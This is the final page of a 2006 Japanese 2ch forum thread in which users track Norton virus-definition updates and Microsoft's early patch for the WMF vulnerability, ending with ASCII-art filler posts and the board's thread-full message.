また、Bloodhound.Exploit.56と判定されていたものの1種をTrojan Horseに変更

976 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:32:33 ID:ML8ek82j0
窓の詳細でサムネイルが見られないと不便だから元に戻してみるかな

977 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:46:24 ID:38RPAdxS0
>>975
ノートン先生のことなら、まだ今日の分の更新は来てないよ。
ttp://www.symantec.com/region/jp/sarcj/defs.download.html
2005/01/06 AM:07:45分の時点

ウィルス定義ファイルのダウンロード
日次更新 詳細へ
ウイルス定義ファイル作成日: January 4
ウイルス定義ファイル公開日: January 4
ウイルス定義ファイルバージョン: 80104f
シーケンス番号: 50911
拡張バージョン: 1/4/2006 rev. 6
ウイルス対策済み数: 71974

週次更新 詳細へ
ウイルス定義ファイル作成日: January 4
ウイルス定義ファイル公開日: January 4
ウイルス定義ファイルバージョン: 80104f
シーケンス番号: 50911
拡張バージョン: 1/4/2006 rev. 6
ウイルス対策済み数: 71974

Norton AntiVirus for Mac
ウイルス定義ファイル公開日: January 4

978 :[名無し]さん(bin+cue).rar:2006/01/06(金) 07:53:59 ID:uCnVeNd/0
更なる混乱を防ぐためにも緊急リリースした訳か。
新年早々、対応のまずさを表に出してんなw

979 :[名無し]さん(bin+cue).rar:2006/01/06(金) 08:03:08 ID:6nC9HQEV0
パッチキタ━━━━(゚∀゚)━━━━!!

980 :[名無し]さん(bin+cue).rar:2006/01/06(金) 08:07:31 ID:IgkzfXXO0
非公式パッチを慌てて当てる必要なかったなあ。

981 :[名無し]さん(bin+cue).rar:2006/01/06(金) 08:29:25 ID:a3aK4GVA0
>>975
>>977
先生の更新は今きたぜ。
8時25分ぐらいだ。

>ウィルス定義ファイルのダウンロード
>
>日次更新 詳細へ
>ウイルス定義ファイル作成日: January 5
>ウイルス定義ファイル公開日: January 5
>ウイルス定義ファイルバージョン: 80104f
>シーケンス番号: 50911
>拡張バージョン: 1/4/2006 rev. 6
>ウイルス対策済み数: 71974
>
>週次更新 詳細へ
>ウイルス定義ファイル作成日: January 4
>ウイルス定義ファイル公開日: January 4
>ウイルス定義ファイルバージョン: 80104f
>シーケンス番号: 50911
>拡張バージョン: 1/4/2006 rev. 6
>ウイルス対策済み数: 71974
>
>Norton AntiVirus for Mac
>ウイルス定義ファイル公開日: January 4


982 :[名無し]さん(bin+cue).rar:2006/01/06(金) 08:50:28 ID:jbGOVEo70
何かMSから更新キタ━━━━━━(゚∀゚)━━━━━━ !!!!! 

983 :[名無し]さん(bin+cue).rar:2006/01/06(金) 08:53:48 ID:Od9B54A50
>>947>>975( ID:Gxt5leUx0 )は、悪名高いNOD厨だろ。
同じ時間帯に、他板でも暴れていたw
http://pc7.2ch.net/test/read.cgi/software/1131430923/376-380

>NOD厨と淫厨を兼ねる
http://tmp5.2ch.net/test/read.cgi/tubo/1130566010/
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
http://mossarilog.at.infoseek.co.jp/

984 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:26:51 ID:RnGab7aK0
公式にアップデートきた

985 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:34:32 ID:cbrzSCou0
                      〃⌒ヽ、
                     //     ヽ
                 ,  ---- 、 | |       |l
             /       `ト、     |!
              /  , -,       ヽ
           / / 〈 / ─ィ//|    ヽ
            /∠//7 ー‐'´〃/  〃ト i   見つかりませんですぅ
          l/| ⌒ト、 C`ー-、 `ー' リi  |
         〈入_{|⊂⊃     ヽ、/\|
           L广ト | l /⌒ヽ、_ ⊂⊃l ̄
         r' /{ lノ八r「ヽnノ_, イl| | 
         } /  〉 厂⊆  ├r ∧/
        ∧|    }L.ニ|L8 、 \! /  〉
       「`ヽト   〈∠ / ̄ \ \__」
      └r┴|` ┬个-------へ __ノ〉
      ト┘ / /7/ `ー-----一へ-┴、
      フー/__/ケ          \-ト、
     /  ノ  /              ∧ `ー、
    / /  イ_                〉 })  }
   \ {   (V\人  i  i       _入/ 〃-- '′
     ``ー‐'" ヽ、二宀¬====二--‐'´

986 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:39:41 ID:eYdb6+QO0
キタ━━━━(゚∀゚)━━━━ッ!!

のはいいんだけど、副作用とかが怖くてちょっと様子見
パッチ当てるとやっぱ再起動必要?

987 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:45:00 ID:CR+ESsq70
>>986
当然

988 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:49:54 ID:eYdb6+QO0
そか……
サンクス

989 :[名無し]さん(bin+cue).rar:2006/01/06(金) 09:59:38 ID:YXDbe9No0
すくなくとも>>147は今回のパッチで回避可能

990 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:05:01 ID:ckV5OA4N0
結局、9x系は関係無しだったの?

991 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:06:02 ID:qRMZz92e0
そろそろ次スレかと

992 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:17:25 ID:QXIOX9Ub0
これってパッチが正常にあたってるかどうかはどこで調べられます?

993 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:20:38 ID:281q8hjD0
>>147
の検証用リンク踏んでみれば?

994 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:24:30 ID:u9xMKcfj0
Microsoft、WMF脆弱性パッチを前倒し公開
ttp://www.itmedia.co.jp/news/articles/0601/06/news014.html
ttp://enterprise.watch.impress.co.jp/cda/security/2006/01/06/6955.html
ttp://www.itmedia.co.jp/news/articles/0601/06/news014.html

995 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:26:06 ID:QXIOX9Ub0
>>993
Athlon64なんでNAV切っても前から無反応なんす。
ファイルのversionいちいち確認しなきゃならないっぽ。

996 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:29:04 ID:nQ7kEU7F0
んで次スレは?

997 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:31:15 ID:Kp8F2HTJ0
                     ___
               ,   ´ ̄.:.:.:.:.:.:.:.:.ヽ、_
             ./.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.`ヽ
           /.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.\
          /.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:',
          ,'.:.:.:.:.:.:.:.:.:.:.:.:.:j:ト、-、.:.:.:`ヽ.:.:.:.:.:.:::',..:.:.:.:.:',
          .l.:.:.:.:.:.:.:.:.:.:.:.:.:/}}  \ヽ、.:.:.:`ヽ.:.:.:.::',.:.:.:.:.:i
          l.:.:.:.:.:!.:.:.:.:.:/./〃_   \.:_、__.:.:ヽ.:.:.:',.:.:.:.:.!
            !.:.:.:.:.:! i ィiナ/ 7⌒`   ヾ⌒ヽマ ヾx.:.:.:.:.:.i
         |.:i.:.:.:i.:.i.:.オ' /       リ  ヽ.:iハ、.:.:.:.:.| うめなのです
         |.:i.:.:.:i.:.i':.:.v,ィォ=ァミ     ァ==ァミV}}.:.:.:.:.:.|
         i.:i.:.:.::i..i.:.i;ゞ i :::::: i      i :::::: i ヌ;:':.:.:.:.:.i
         .{ハ.:.:.:.i ハ\ ヾ_;;;ソ      ヾ_;;ソ/イj:.:.:.:.:.,'
          リ ',.:.:..i:.:.:i.:',ヽ:::::::.   '    .:::::::/.://.:./:/
         ヽヽ.:.:ヽ.:.ヾヽ、    ー‐     /〃ソ/
           ヽ、:ヽ、ハ、::d 、     イフ"/'
                 ノ<=l、` - ´, ヒフヽ
               /: : : : : \ゝム´/: : :\
              /: : : : : : : : : `ゝ´: : : : : : : \

998 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:32:37 ID:Kp8F2HTJ0
                      、-─w─,-  、
              , ´"   `´    "゙ヽ
              /             ヽ
.             /:/ ::    .;   :.    ヽ:  ハ
         /// :/::/: /: l::. :: :!::!:}:: :', ::!. 'ハ
         / i::!:: ::!::/::/!::::jy::: :: lvヘ:i:::::',::i:: : !::i\
          /.:.:.i::i::: .:i;;{,斗::爪 :::: ::::!ハ:仆:、j::!: :::i!::!:. ヽ
       /.:.:.:.:|:i:::: ::!:::!    !::: :::リイ"  V`i:: ::!i: !.: ヽ   うめなのですよ〜
.       /.:.:.:.:.:.|:i:::: ::ハ:! (   )ヾノ (   ) /:.:::!.!::!:.:. ヘ
      /  .:.:.:.:.!:l:!::. k_ヽ││"   "| │ハ::.:::i .i::!.:.:.  ヘ
     / ..:.:.:.:ノ!:!ヽ:: .:ト::ゝ! rー-‐‐、| !イ7: :/ヽ!:!.:.:.:.:. ヘ
     /..:.:.:./  !:! ヽ::ハ:! 个ッ. ─ ィ´/:イ::// 〃!\:.:.:.:..ハ
    /.:.:/   ヾ  ヾ!  , { ̄Y  ̄ j、_〃/ 〃ノ  `ヽ、:.ヽ
    '"´      ,  -rtヘ'´__ヾ ⊥ /__"`ゝtr― 、      ̄
         /   j! {く::::. .::{ † }.:  .:>//!:   \
        /    :::! {{ 〉::  ゝ 人  }//i!:.     \

999 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:34:00 ID:Kp8F2HTJ0
        _    _
       / yヽ-/_ヽ
    .-/  /⌒  ´'⌒ヽ、
   / /  / /,   ヽヽ 、\\
.  / l. //.| |!  i.|:.:| |. i、ヽヽ
 / . .:|:.:.|廾l弋  廾ナ|: |:.|!.| j
 |.:::.:_|::├‐云 ヾ〒‐ヵ| ,レ{リ    うめ〜
 ト ん|::. 辷.ソ   .辷ソ´|::ハ |
  ^'∧: |、' ' rっ ' '// .リ, -=ぅ
    'ヽ〉 >┬t< レ′/ /´
      /、 匸)、| ̄ ̄  /
      ./ |   ` {ー ―‐'
     h |      l
     | |     |
     |  j    |

1000 :[名無し]さん(bin+cue).rar:2006/01/06(金) 10:34:47 ID:smq7XCo30
cc5d733abd6f08

1001 :1001:Over 1000 Thread
                ,,-‐''""''ー--,- >>1001 遅いんだよバカ、とっとと次スレ立てろ(プゲラ
             .|"""        || >>999 何が1000だ、寝言は寝てから言え
:::::::::::::::::::::::::::      |     げ  と .|| >>998 体臭が回線を通じて匂ってきてるぞ(w
:::::::::::::::::::::::::::::::     |  1000  っ   .|| >>997 糞レスしてる暇あったら今日の寝床探せ
:::::::::::::::::::::::::::::::::::::::::::::::|       ,ノ""""'|| >>996 お前はハンバーグの材料な
  ::::::::::::::::::::::::::::::::::  |   ,/"""      .|| .>>995 深夜に空き缶拾い集める癖を直せ
::::::::::::::::::::::::::::::::::    """"        .|| .>>994 以下はiriaからやりなおせ
                       / )
                      / /|| 
                      / /. 
                    ( (     /⌒ヽ
                     ヽ ヽ⊂ ̄ ̄ ̄⊃ <ぐわっはっはっは!!!!
                      \\(´∀` )     n   ダウソ板は永遠に不滅だ!!!
                       ハ      \    ( E)
                        |     /ヽ ヽ_//   http://tmp5.2ch.net/download/
>>1001
早く次スレ立てろよ、バカ


267 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)